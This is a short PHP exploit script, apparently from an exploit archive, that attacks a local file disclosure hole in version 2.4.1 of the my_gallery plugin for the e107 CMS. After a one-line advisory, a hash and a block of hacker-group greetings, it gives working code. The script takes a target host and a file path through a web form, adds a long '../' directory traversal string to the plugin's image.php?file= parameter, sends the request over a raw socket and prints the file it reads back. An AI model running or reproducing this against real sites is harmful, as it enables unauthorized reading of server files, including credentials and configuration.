The my_gallery version 2.4.1 plugin for e107 suffers from a local file disclosure vulnerability in readfile().
cfc848134d90297d8b1e87adcfb56229a852765353221339c2b362ae6383cdcd
MainHack BrotherHood [ http://news.serverisdown.org ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
FUCK TERORIS!!
*/
$vuln = '/e107_plugins/my_gallery/image.php?file=';
$trasv = '/../../../../../../../../../../../../../../..';
echo "<form method=POST>
Web 2 XPL : <input type=\"text\" name=\"host\" size=30>
File 2 Read : <input type=\"text\" name=\"file\" size=30>
<input type=submit value=\"Go!!!\" name=\"_xpl\">
<br><br>";
if ($_POST['_xpl']) {
$data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "Connection: close\r\n\r\n";
$html = sendpacket($host,$data);
print '<pre>'.htmlspecialchars($html).'</pre>';
}
echo "</form>";
function sendpacket($host,$data) {
if (!$sock = @fsockopen($host,80)) {
die("[!] Connection refused, try again!\n");
}
fputs($sock,$data);
while (!feof($sock)) { $html .= fgets($sock); }
fclose($sock);
return $html;
}
?>